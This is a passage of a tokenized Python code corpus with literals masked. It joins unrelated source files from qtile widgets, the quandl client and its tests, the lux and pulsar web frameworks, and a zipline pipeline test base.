path ) <EOL> if self . space_type == '<STR_LIT>' : <EOL> return ( stats . f_blocks - stats . f_bfree ) * stats . f_frsize <EOL> else : <EOL> return stats . f_bavail * stats . f_frsize <EOL> def update_graph ( self ) : <EOL> val = self . _getValues ( ) <EOL> self . push ( val ) <EOL> class HDDBusyGraph ( _Graph ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> _Graph . __init__ ( self , ** config ) <EOL> self . add_defaults ( HDDBusyGraph . defaults ) <EOL> self . path = '<STR_LIT>' . format ( <EOL> dev = self . device <EOL> ) <EOL> self . _prev = <NUM_LIT:0> <EOL> def _getActivity ( self ) : <EOL> try : <EOL> with open ( self . path ) as f : <EOL> io_ticks = int ( f . read ( ) . split ( ) [ <NUM_LIT:9> ] ) <EOL> except IOError : <EOL> return <NUM_LIT:0> <EOL> activity = io_ticks - self . _prev <EOL> self . _prev = io_ticks <EOL> return activity <EOL> def update_graph ( self ) : <EOL> self . push ( self . _getActivity ( ) ) </s>
<s> from . import base <EOL> from libqtile . log_utils import logger <EOL> try : <EOL> from pythonwifi . iwlibs import Wireless , Iwstats <EOL> def get_status ( interface ) : <EOL> interface = Wireless ( interface ) <EOL> try : <EOL> stats = Iwstats ( interface ) <EOL> except IOError : <EOL> return ( None , None ) <EOL> quality = stats . qual . quality <EOL> essid = interface . getEssid ( ) <EOL> return ( essid , quality ) <EOL> except ImportError : <EOL> import iwlib <EOL> def get_status ( interface ) : <EOL> interface = iwlib . get_iwconfig ( interface ) <EOL> if '<STR_LIT>' not in interface : <EOL> return ( None , None ) <EOL> quality = interface [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> essid = bytes ( interface [ '<STR_LIT>' ] ) . decode ( ) <EOL> return ( essid , quality ) <EOL> class Wlan ( base . InLoopPollText ) : <EOL> """<STR_LIT>""" <EOL> orientations = base . ORIENTATION_HORIZONTAL <EOL> defaults = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) <EOL> ] <EOL> def __init__ ( self , ** config ) : <EOL> base . InLoopPollText . __init__ ( self , ** config ) <EOL> self . add_defaults ( Wlan . defaults ) <EOL> def poll ( self ) : <EOL> try : <EOL> essid , quality = get_status ( self . interface ) <EOL> disconnected = essid is None <EOL> if disconnected : <EOL> return self . disconnected_message <EOL> return self . format . format ( <EOL> essid = essid , <EOL> quality = quality , <EOL> percent = ( quality / <NUM_LIT> ) <EOL> ) <EOL> except EnvironmentError : <EOL> logger . error ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> self . __class__ . __name__ ) </s>
<s> from quandl . operations . data_list import DataListOperation <EOL> from quandl . util import Util <EOL> from . model_base import ModelBase <EOL> from . data_mixin import DataMixin <EOL> class Data ( DataListOperation , DataMixin , ModelBase ) : <EOL> def __init__ ( self , data , ** options ) : <EOL> self . meta = options [ '<STR_LIT>' ] <EOL> self . _raw_data = Util . convert_to_dates ( data ) <EOL> if '<STR_LIT>' in options . keys ( ) : <EOL> self . _converted_column_names = options [ '<STR_LIT>' ] <EOL> def data_fields ( self ) : <EOL> if not self . _converted_column_names and self . meta : <EOL> self . _converted_column_names = Util . convert_column_names ( self . meta ) <EOL> return self . _converted_column_names <EOL> def __getattr__ ( self , k ) : <EOL> if k [ <NUM_LIT:0> ] == '<STR_LIT:_>' and k != '<STR_LIT>' : <EOL> raise AttributeError ( k ) <EOL> elif k in self . meta : <EOL> return self . meta [ k ] <EOL> elif k in self . data_fields ( ) : <EOL> return self . _raw_data [ self . data_fields ( ) . index ( k ) ] <EOL> return super ( Data , self ) . __getattr__ ( k ) </s>
<s> import re <EOL> import jsondate as json <EOL> import six <EOL> from quandl . model . dataset import Dataset <EOL> from quandl . model . data import Data <EOL> from quandl . model . data_list import DataList <EOL> from test . factories . dataset import DatasetFactory <EOL> from test . factories . dataset_data import DatasetDataFactory <EOL> def setupDatasetsTest ( unit_test , httpretty ) : <EOL> httpretty . reset ( ) <EOL> httpretty . enable ( ) <EOL> unit_test . dataset_data = { '<STR_LIT>' : DatasetDataFactory . build ( ) } <EOL> single_col_data = DatasetDataFactory . build ( column_names = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] , <EOL> data = [ [ '<STR_LIT>' , <NUM_LIT> ] , [ '<STR_LIT>' , <NUM_LIT> ] , <EOL> [ '<STR_LIT>' , <NUM_LIT> ] , [ '<STR_LIT>' , <NUM_LIT> ] ] ) <EOL> unit_test . single_dataset_data = { '<STR_LIT>' : single_col_data } <EOL> dataset_data = DatasetDataFactory . build ( ) <EOL> d_values = dataset_data . pop ( '<STR_LIT:data>' ) <EOL> d_metadata = dataset_data <EOL> unit_test . data_list_obj = DataList ( Data , d_values , d_metadata ) <EOL> unit_test . nse_oil = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' ) } <EOL> unit_test . goog_aapl = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' ) } <EOL> unit_test . goog_msft = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' , <EOL> newest_available_date = '<STR_LIT>' , oldest_available_date = '<STR_LIT>' ) } <EOL> unit_test . single_col = { '<STR_LIT>' : DatasetFactory . build ( <EOL> database_code = '<STR_LIT>' , dataset_code = '<STR_LIT>' , <EOL> newest_available_date = '<STR_LIT>' , oldest_available_date = '<STR_LIT>' ) } <EOL> unit_test . oil_obj = Dataset ( '<STR_LIT>' , unit_test . nse_oil [ '<STR_LIT>' ] ) <EOL> unit_test . aapl_obj = Dataset ( '<STR_LIT>' , unit_test . goog_aapl [ '<STR_LIT>' ] ) <EOL> unit_test . goog_obj = Dataset ( '<STR_LIT>' , unit_test . goog_msft [ '<STR_LIT>' ] ) <EOL> unit_test . single_col_obj = Dataset ( '<STR_LIT>' , unit_test . single_col [ '<STR_LIT>' ] ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> re . compile ( <EOL> '<STR_LIT>' ) , <EOL> responses = [ httpretty . Response ( body = json . dumps ( dataset ) ) <EOL> for dataset in <EOL> [ unit_test . nse_oil , unit_test . goog_aapl , <EOL> unit_test . goog_msft ] ] ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> "<STR_LIT>" , <EOL> body = json . dumps ( unit_test . single_dataset_data ) ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> "<STR_LIT>" , <EOL> body = json . dumps ( unit_test . dataset_data ) ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> re . compile ( <EOL> '<STR_LIT>' ) , <EOL> body = json . dumps ( unit_test . dataset_data ) ) <EOL> httpretty . register_uri ( httpretty . GET , <EOL> re . compile ( <EOL> '<STR_LIT>' ) , <EOL> body = json . dumps ( unit_test . dataset_data ) ) </s>
<s> '''<STR_LIT>''' <EOL> import argparse <EOL> import logging <EOL> from pulsar import Setting , Application , ImproperlyConfigured , isawaitable <EOL> from pulsar . utils . config import Config , LogLevel , Debug , LogHandlers <EOL> from lux import __version__ <EOL> from lux . utils . async import maybe_green <EOL> class ConfigError ( Exception ) : <EOL> def __init__ ( self , config_file ) : <EOL> self . config_file = config_file <EOL> class CommandError ( ImproperlyConfigured ) : <EOL> pass <EOL> def service_parser ( services , description , help = True ) : <EOL> description = description or '<STR_LIT>' <EOL> p = argparse . ArgumentParser ( <EOL> description = description , add_help = help ) <EOL> p . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:?>' , choices = services , <EOL> help = '<STR_LIT>' ) <EOL> return p <EOL> class ConsoleParser ( object ) : <EOL> '''<STR_LIT>''' <EOL> help = None <EOL> option_list = ( ) <EOL> default_option_list = ( LogLevel ( ) , <EOL> LogHandlers ( default = [ '<STR_LIT>' ] ) , <EOL> Debug ( ) ) <EOL> @ property <EOL> def config_module ( self ) : <EOL> raise NotImplementedError <EOL> def get_version ( self ) : <EOL> raise NotImplementedError <EOL> def get_parser ( self , ** params ) : <EOL> parser = argparse . ArgumentParser ( ** params ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:version>' , <EOL> version = self . get_version ( ) , <EOL> help = "<STR_LIT>" ) <EOL> config = Setting ( '<STR_LIT>' , <EOL> ( '<STR_LIT:-c>' , '<STR_LIT>' ) , <EOL> default = self . config_module , <EOL> desc = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> config . add_argument ( parser , True ) <EOL> for opt in self . default_option_list : <EOL> opt . add_argument ( parser , True ) <EOL> for opt in self . option_list : <EOL> opt . add_argument ( parser , True ) <EOL> return parser <EOL> class LuxApp ( Application ) : <EOL> def __call__ ( self ) : <EOL> try : <EOL> return super ( ) . __call__ ( ) <EOL> except ImproperlyConfigured : <EOL> pass <EOL> def on_config ( self , actor ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> class LuxCommand ( ConsoleParser ) : <EOL> '''<STR_LIT>''' <EOL> pulsar_config_include = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , name , app ) : <EOL> self . name = name <EOL> self . app = app <EOL> def __call__ ( self , argv , ** params ) : <EOL> app = self . pulsar_app ( argv ) <EOL> app ( ) <EOL> assert self . app . wsgi_handler ( ) <EOL> result = maybe_green ( self . app , self . run , app . cfg , ** params ) <EOL> if isawaitable ( result ) and not self . app . _loop . is_running ( ) : <EOL> result = self . app . _loop . run_until_complete ( result ) <EOL> return result <EOL> def get_version ( self ) : <EOL> """<STR_LIT>""" <EOL> return __version__ <EOL> @ property <EOL> def config_module ( self ) : <EOL> return self . app . config_module <EOL> def run ( self , argv , ** params ) : <EOL> '''<STR_LIT>''' <EOL> raise NotImplementedError <EOL> @ property <EOL> def logger ( self ) : <EOL> return logging . getLogger ( '<STR_LIT>' % self . name ) <EOL> def write ( self , stream = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> self . app . write ( stream ) <EOL> def write_err ( self , stream = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> self . app . write_err ( stream ) <EOL> def pulsar_app ( self , argv , application = None , log_name = '<STR_LIT>' , ** kw ) : <EOL> app = self . app <EOL> if application is None : <EOL> application = LuxApp <EOL> cfg = Config ( include = self . pulsar_config_include ) <EOL> else : <EOL> cfg = application . cfg . copy ( ) <EOL> for setting in self . option_list : <EOL> cfg . settings [ setting . name ] = setting . copy ( ) <EOL> return application ( callable = app . callable , <EOL> description = self . help , <EOL> epilog = app . config . get ( '<STR_LIT>' ) , <EOL> cfg = cfg , <EOL> argv = argv , <EOL> log_name = log_name , <EOL> version = app . meta . version , <EOL> debug = app . debug , <EOL> config = app . config_module , <EOL> ** kw ) </s>
<s> import json <EOL> from lux . core import Html <EOL> from lux . utils . crypt import get_random_string <EOL> def grid ( options , id = None ) : <EOL> if not id : <EOL> id = '<STR_LIT>' % get_random_string ( <NUM_LIT:5> ) <EOL> script = grid_script % ( id , json . dumps ( options ) ) <EOL> container = Html ( '<STR_LIT>' ) . attr ( '<STR_LIT>' , '<STR_LIT>' % id ) <EOL> container . append ( script ) <EOL> return container . render ( ) <EOL> grid_script = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) </s>
<s> from sqlalchemy . orm import relationship , backref <EOL> from sqlalchemy import Column , Integer , String , ForeignKey , DateTime <EOL> from odm . types import JSONType <EOL> from odm import declared_attr , copy_models <EOL> import lux . extensions . auth . models as auth <EOL> copy_models ( auth , __name__ ) <EOL> Model = auth . Model <EOL> class User ( auth . User ) : <EOL> """<STR_LIT>""" <EOL> oauth = Column ( JSONType ) <EOL> class AccessToken ( Model ) : <EOL> """<STR_LIT>""" <EOL> token = Column ( String ( <NUM_LIT:255> ) , primary_key = True ) <EOL> provider = Column ( String ( <NUM_LIT:12> ) , primary_key = True ) <EOL> expires = Column ( DateTime ) <EOL> scope = Column ( JSONType ) <EOL> type = Column ( String ( <NUM_LIT:12> ) ) <EOL> @ declared_attr <EOL> def user_id ( cls ) : <EOL> return Column ( Integer , ForeignKey ( '<STR_LIT>' ) ) <EOL> @ declared_attr <EOL> def user ( cls ) : <EOL> return relationship ( <EOL> '<STR_LIT>' , <EOL> backref = backref ( "<STR_LIT>" , cascade = "<STR_LIT>" ) ) </s>
<s> from pulsar . utils . httpurl import iri_to_uri <EOL> class Pagination : <EOL> def first_link ( self , request , total , limit , offset ) : <EOL> n = self . _count_part ( offset , limit , <NUM_LIT:0> ) <EOL> if n : <EOL> offset -= n * limit <EOL> if offset > <NUM_LIT:0> : <EOL> return self . link ( request , <NUM_LIT:0> , min ( limit , offset ) ) <EOL> def prev_link ( self , request , total , limit , offset ) : <EOL> if offset : <EOL> olimit = min ( limit , offset ) <EOL> prev_offset = offset - olimit <EOL> return self . link ( request , prev_offset , olimit ) <EOL> def next_link ( self , request , total , limit , offset ) : <EOL> next_offset = offset + limit <EOL> if total > next_offset : <EOL> return self . link ( request , next_offset , limit ) <EOL> def last_link ( self , request , total , limit , offset ) : <EOL> n = self . _count_part ( total , limit , offset ) <EOL> if n > <NUM_LIT:0> : <EOL> return self . link ( request , offset + n * limit , limit ) <EOL> def link ( self , request , offset , limit ) : <EOL> params = request . url_data . copy ( ) <EOL> cfg = request . config <EOL> params . update ( { cfg [ '<STR_LIT>' ] : offset , <EOL> cfg [ '<STR_LIT>' ] : limit } ) <EOL> location = iri_to_uri ( request . path , params ) <EOL> return request . absolute_uri ( location ) <EOL> def __call__ ( self , request , result , total , limit , offset ) : <EOL> data = { <EOL> '<STR_LIT>' : total , <EOL> '<STR_LIT:result>' : result <EOL> } <EOL> first = self . first_link ( request , total , limit , offset ) <EOL> if first : <EOL> data [ '<STR_LIT>' ] = first <EOL> prev = self . prev_link ( request , total , limit , offset ) <EOL> if prev != first : <EOL> data [ '<STR_LIT>' ] = prev <EOL> next = self . next_link ( request , total , limit , offset ) <EOL> if next : <EOL> last = self . last_link ( request , total , limit , offset ) <EOL> if last != next : <EOL> data [ '<STR_LIT>' ] = next <EOL> data [ '<STR_LIT>' ] = last <EOL> return data <EOL> def _count_part ( self , total , limit , offset ) : <EOL> n = ( total - offset ) // limit <EOL> if n * limit + offset == total : <EOL> n -= <NUM_LIT:1> <EOL> return max ( <NUM_LIT:0> , n ) <EOL> class GithubPagination ( Pagination ) : <EOL> '''<STR_LIT>''' <EOL> def __call__ ( self , request , result , total , limit , offset ) : <EOL> links = [ ] <EOL> first = self . first_link ( request , total , limit , offset ) <EOL> if first : <EOL> links . append ( first ) <EOL> prev = self . prev_link ( request , total , limit , offset ) <EOL> if prev != first : <EOL> links . append ( prev ) <EOL> next = self . next_link ( request , total , limit , offset ) <EOL> if next : <EOL> last = self . last_link ( request , total , limit , offset ) <EOL> if last != next : <EOL> links . append ( next ) <EOL> links . append ( last ) <EOL> request . response [ '<STR_LIT>' ] = links <EOL> return result </s>
<s> '''<STR_LIT>''' <EOL> from pulsar import arbiter <EOL> def hello ( actor , ** kw ) : <EOL> print ( '<STR_LIT>' ) <EOL> actor . _loop . call_later ( <NUM_LIT:1> , hello , actor ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arbiter ( start = hello ) . start ( ) </s>
<s> from pulsar . apps . http import HttpClient <EOL> from . utils import wait <EOL> class GreenHttp : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , http = None ) : <EOL> self . _http = http or HttpClient ( ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . _http , name ) <EOL> def get ( self , url , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return self . request ( '<STR_LIT:GET>' , url , ** kwargs ) <EOL> def options ( self , url , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def head ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def post ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT:POST>' , url , ** kwargs ) <EOL> def put ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def patch ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def delete ( self , url , ** kwargs ) : <EOL> return self . request ( '<STR_LIT>' , url , ** kwargs ) <EOL> def request ( self , method , url , ** kw ) : <EOL> return wait ( self . _http . request ( method , url , ** kw ) , True ) </s>
<s> """<STR_LIT>""" <EOL> import asyncio <EOL> from functools import partial <EOL> from pulsar . apps import http <EOL> from pulsar . apps . wsgi import HttpServerResponse <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class DummyTransport ( asyncio . Transport ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , connnection ) : <EOL> self . client = client <EOL> self . connection = connnection <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . connection . data_received ( data ) <EOL> @ property <EOL> def address ( self ) : <EOL> return self . connection . address <EOL> class DummyConnectionPool : <EOL> """<STR_LIT>""" <EOL> def get_or_create_connection ( self , producer ) : <EOL> client = self . connection_factory ( self . address , <NUM_LIT:1> , <NUM_LIT:0> , <EOL> producer . consumer_factory , <EOL> producer ) <EOL> server = self . connection_factory ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) , <NUM_LIT:1> , <NUM_LIT:0> , <EOL> producer . server_consumer , <EOL> producer ) <EOL> client . connection_made ( DummyTransport ( producer , server ) ) <EOL> server . connection_made ( DummyTransport ( producer , client ) ) <EOL> return client <EOL> class HttpTestClient ( http . HttpClient ) : <EOL> """<STR_LIT>""" <EOL> client_version = '<STR_LIT>' <EOL> connection_pool = DummyConnectionPool <EOL> def __init__ ( self , test , wsgi_handler , ** kwargs ) : <EOL> self . test = test <EOL> self . wsgi_handler = wsgi_handler <EOL> self . server_consumer = partial ( HttpServerResponse , wsgi_handler , <EOL> test . cfg ) <EOL> super ( ) . __init__ ( ** kwargs ) <EOL> def data_received ( self , connnection , data ) : <EOL> pass <EOL> def response ( self , request ) : <EOL> conn = self . get_connection ( request ) <EOL> consumer = conn . consumer_factory ( conn ) <EOL> consumer . new_request ( request ) <EOL> return consumer </s>
<s> import os <EOL> import signal <EOL> import ctypes <EOL> import ctypes . wintypes <EOL> import socket <EOL> import getpass <EOL> from multiprocessing import current_process <EOL> from . base import * <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> SetHandleInformation = ctypes . windll . kernel32 . SetHandleInformation <EOL> SetHandleInformation . argtypes = ( ctypes . wintypes . HANDLE , ctypes . wintypes . DWORD , <EOL> ctypes . wintypes . DWORD ) <EOL> SetHandleInformation . restype = ctypes . wintypes . BOOL <EOL> HANDLE_FLAG_INHERIT = <NUM_LIT> <EOL> EXIT_SIGNALS = ( signal . SIGINT , signal . SIGTERM , signal . SIGABRT , signal . SIGBREAK ) <EOL> def set_owner_process ( gid , uid ) : <EOL> return None <EOL> def get_parent_id ( ) : <EOL> if ispy32 : <EOL> return os . getppid ( ) <EOL> else : <EOL> return None <EOL> def chown ( path , uid , gid ) : <EOL> pass <EOL> def close_on_exec ( fd ) : <EOL> if fd : <EOL> success = SetHandleInformation ( fd , HANDLE_FLAG_INHERIT , <NUM_LIT:0> ) <EOL> if not success : <EOL> raise ctypes . GetLastError ( ) <EOL> def _set_non_blocking ( fd ) : <EOL> pass <EOL> def get_uid ( user = None ) : <EOL> if not user : <EOL> return getpass . getuser ( ) <EOL> elif user == getpass . getuser ( ) : <EOL> return user <EOL> def get_gid ( group = None ) : <EOL> return None <EOL> def setpgrp ( ) : <EOL> pass <EOL> def get_maxfd ( ) : <EOL> return MAXFD <EOL> def daemonize ( ) : <EOL> pass <EOL> def socketpair ( family = socket . AF_INET , type = socket . SOCK_STREAM , proto = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> lsock = socket . socket ( family , type , proto ) <EOL> lsock . bind ( ( '<STR_LIT:localhost>' , <NUM_LIT:0> ) ) <EOL> lsock . listen ( <NUM_LIT:1> ) <EOL> addr , port = lsock . getsockname ( ) <EOL> csock = socket . socket ( family , type , proto ) <EOL> csock . setblocking ( True ) <EOL> try : <EOL> csock . connect ( ( addr , port ) ) <EOL> except Exception : <EOL> lsock . close ( ) <EOL> csock . close ( ) <EOL> raise <EOL> ssock , _ = lsock . accept ( ) <EOL> csock . setblocking ( True ) <EOL> lsock . close ( ) <EOL> return ( ssock , csock ) </s>
<s> import requests <EOL> from pulsar . apps . test import dont_run_with_thread <EOL> class TestRequest : <EOL> session = requests . session ( ) <EOL> @ dont_run_with_thread <EOL> def test_requests_get_200 ( self ) : <EOL> http = self . session <EOL> response = http . get ( self . httpbin ( ) , verify = False , <EOL> proxies = self . proxies ( ) ) <EOL> self . assertEqual ( str ( response ) , '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> self . assertTrue ( response . content ) <EOL> self . assertEqual ( response . url , self . httpbin ( ) ) <EOL> response = http . get ( self . httpbin ( '<STR_LIT>' ) , verify = False , <EOL> proxies = self . proxies ( ) ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) </s>
<s> import socket <EOL> import unittest <EOL> from unittest import mock <EOL> from pulsar . utils . internet import ( parse_address , parse_connection_string , <EOL> close_socket , format_address ) <EOL> class TestParseAddress ( unittest . TestCase ) : <EOL> def test_parse_ipv4 ( self ) : <EOL> address = parse_address ( '<STR_LIT:127.0.0.1>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> address = parse_address ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> def test_parse_ipv6 ( self ) : <EOL> address = parse_address ( '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> address = parse_address ( '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> def test_parse_error ( self ) : <EOL> self . assertRaises ( ValueError , parse_address , ( ) ) <EOL> self . assertRaises ( ValueError , parse_address , ( <NUM_LIT:1> , ) ) <EOL> self . assertRaises ( ValueError , parse_address , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> self . assertRaises ( ValueError , parse_address , '<STR_LIT>' ) <EOL> class TestParseConnectionString ( unittest . TestCase ) : <EOL> def test_parse_tcp ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_tcp_default ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_unix ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , '<STR_LIT>' ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_unix_with_scheme ( self ) : <EOL> scheme , address , params = parse_connection_string ( <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , '<STR_LIT>' ) <EOL> self . assertEqual ( params , { } ) <EOL> def test_parse_tcp_with_scheme_and_params ( self ) : <EOL> scheme , address , params = parse_connection_string ( '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { '<STR_LIT>' : '<STR_LIT:3>' } ) <EOL> def test_parse_tcp_with_http_and_params ( self ) : <EOL> scheme , address , params = parse_connection_string ( <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT:http>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> def test_parse_tcp_with_https_and_params ( self ) : <EOL> scheme , address , params = parse_connection_string ( <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( scheme , '<STR_LIT>' ) <EOL> self . assertEqual ( address , ( '<STR_LIT:127.0.0.1>' , <NUM_LIT> ) ) <EOL> self . assertEqual ( params , { '<STR_LIT>' : '<STR_LIT:3>' , '<STR_LIT>' : '<STR_LIT:foo>' } ) <EOL> class TestMisc ( unittest . TestCase ) : <EOL> def test_close_socket ( self ) : <EOL> close_socket ( None ) <EOL> sock = mock . Mock ( ) <EOL> sock . configure_mock ( ** { '<STR_LIT>' : TypeError , <EOL> '<STR_LIT>' : TypeError } ) <EOL> close_socket ( sock ) <EOL> sock . shutdown . assert_called_with ( socket . SHUT_RDWR ) <EOL> sock . close . assert_called_with ( ) <EOL> def test_format_address ( self ) : <EOL> self . assertRaises ( ValueError , format_address , ( <NUM_LIT:1> , ) ) <EOL> self . assertRaises ( ValueError , format_address , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> self . assertRaises ( ValueError , format_address , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> self . assertEqual ( format_address ( <NUM_LIT:1> ) , '<STR_LIT:1>' ) </s>
<s> """<STR_LIT>""" <EOL> from functools import wraps <EOL> from unittest import TestCase <EOL> import numpy as np <EOL> from numpy import arange , prod <EOL> from pandas import date_range , Int64Index , DataFrame <EOL> from six import iteritems <EOL> from zipline . assets . synthetic import make_simple_equity_info <EOL> from zipline . pipeline . engine import SimplePipelineEngine <EOL> from zipline . pipeline import TermGraph <EOL> from zipline . pipeline . term import AssetExists <EOL> from zipline . testing import ( <EOL> check_arrays , <EOL> ExplodingObject , <EOL> tmp_asset_finder , <EOL> ) <EOL> from zipline . utils . functional import dzip_exact <EOL> from zipline . utils . pandas_utils import explode <EOL> from zipline . utils . tradingcalendar import trading_day <EOL> def with_defaults ( ** default_funcs ) : <EOL> """<STR_LIT>""" <EOL> def decorator ( f ) : <EOL> @ wraps ( f ) <EOL> def method ( self , * args , ** kwargs ) : <EOL> for name , func in iteritems ( default_funcs ) : <EOL> if name not in kwargs : <EOL> kwargs [ name ] = func ( self ) <EOL> return f ( self , * args , ** kwargs ) <EOL> return method <EOL> return decorator <EOL> with_default_shape = with_defaults ( shape = lambda self : self . default_shape ) <EOL> class BasePipelineTestCase ( TestCase ) : <EOL> @ classmethod <EOL> def setUpClass ( cls ) : <EOL> cls . __calendar = date_range ( '<STR_LIT>' , '<STR_LIT>' , freq = trading_day ) <EOL> cls . __assets = assets = Int64Index ( arange ( <NUM_LIT:1> , <NUM_LIT:20> ) ) <EOL> cls . __tmp_finder_ctx = tmp_asset_finder ( <EOL> equities = make_simple_equity_info ( <EOL> assets , <EOL> cls . __calendar [ <NUM_LIT:0> ] , <EOL> cls . __calendar [ - <NUM_LIT:1> ] , <EOL> ) <EOL> ) <EOL> cls . __finder = cls . __tmp_finder_ctx . __enter__ ( ) <EOL> cls . __mask = cls . __finder . lifetimes ( <EOL> cls . __calendar [ - <NUM_LIT:30> : ] , <EOL> include_start_date = False , <EOL> ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> cls . __tmp_finder_ctx . __exit__ ( ) <EOL> @ property <EOL> def default_shape ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __mask . shape <EOL> def run_graph ( self , graph , initial_workspace , mask = None ) : <EOL> """<STR_LIT>""" <EOL> engine = SimplePipelineEngine ( <EOL> lambda column : ExplodingObject ( ) , <EOL> self . __calendar , <EOL> self . __finder , <EOL> ) <EOL> if mask is None : <EOL> mask = self . __mask <EOL> dates , assets , mask_values = explode ( mask ) <EOL> initial_workspace . setdefault ( AssetExists ( ) , mask_values ) <EOL> return engine . compute_chunk ( <EOL> graph , <EOL> dates , <EOL> assets , <EOL> initial_workspace , <EOL> ) <EOL> def check_terms ( self , terms , expected , initial_workspace , mask ) : <EOL> """<STR_LIT>""" <EOL> graph = TermGraph ( terms ) <EOL> results = self . run_graph ( graph , initial_workspace , mask ) <EOL> for key , ( res , exp ) in dzip_exact ( results , expected ) . items ( ) : <EOL> check_arrays ( res , exp ) <EOL> def build_mask ( self , array ) : <EOL> """<STR_LIT>""" <EOL> ndates , nassets = array . shape <EOL> return DataFrame ( <EOL> array , <EOL> index = self . 